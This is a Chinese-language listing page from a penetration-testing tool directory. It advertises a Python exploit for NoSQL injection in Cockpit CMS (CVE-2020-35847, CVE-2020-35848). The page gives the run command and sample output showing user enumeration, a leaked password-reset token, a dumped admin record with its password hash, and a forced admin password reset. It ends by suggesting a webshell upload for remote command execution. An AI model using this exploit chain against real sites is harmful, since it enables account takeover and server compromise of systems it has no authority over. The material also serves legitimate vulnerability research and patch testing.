Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-35847_CVE-2020-35848 — CVE-2020-35847, CVE-2020-35848 : Account Takeover | Kitploit
工具/GitHubGitHub/w33vils/cve-2020-35847_cve-2020-35848
ReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation Gathering
GitHubw33vils/cve-2020-35847_cve-2020-35848

CVE-2020-35847_CVE-2020-35848

CVE-2020-35847, CVE-2020-35848 : Account Takeover

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
23年前尚未审核

Cockpit CMS NoSQL注入(CVE-2020-35847,CVE-2020-35848)

Cockpit CMS 0.11.2之前版本在 /auth/resetpassword 和 /auth/newpassword 接口中存在NoSQL注入漏洞,可导致密码重置令牌泄露,进而实现用户信息枚举及密码重置。

阅读更多 - https://swarm.ptsecurity.com/rce-cockpit-cms/

此Python脚本用于枚举系统用户并重置密码。

使用方法

root@kitploit:~
python3 exploit.py -u http://cockpit-site-url

脚本首先枚举系统用户。

root@kitploit:~
[+] http://cockpit-site-url: 可访问
[-] 正在尝试用户名枚举 (CVE-2020-35846) : 

[+] 发现用户 : ['admin', 'user1', 'user2', 'user3']

接着你可以选择要获取更多信息的用户。此操作还会生成该用户的重置令牌,这是密码重置的关键条件。

root@kitploit:~
[-] 获取用户详情 针对 : admin
[+] 正在查找密码重置令牌
         找到令牌 : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] 获取用户信息 
-----------------详细信息--------------------
         [*] 用户 : admin
         [*] 名称 : Admin
         [*] 邮箱 : [email protected]
         [*] 激活 : True
         [*] 组 : admin
         [*] 密码 : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
         [*] 语言 : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------

最后你可以选择重置该用户的密码。

root@kitploit:~
[+] 是否要为 admin 重置密码? (Y/n): y
[-] 正在尝试重置 admin 的密码:
[+] 密码更新成功!
[+] admin 的新凭据为: 
         用户名 : admin 
         密码 : new_random_password

然后你可以选择通过 /finder 组件上传webshell以获得远程命令执行。

下载工具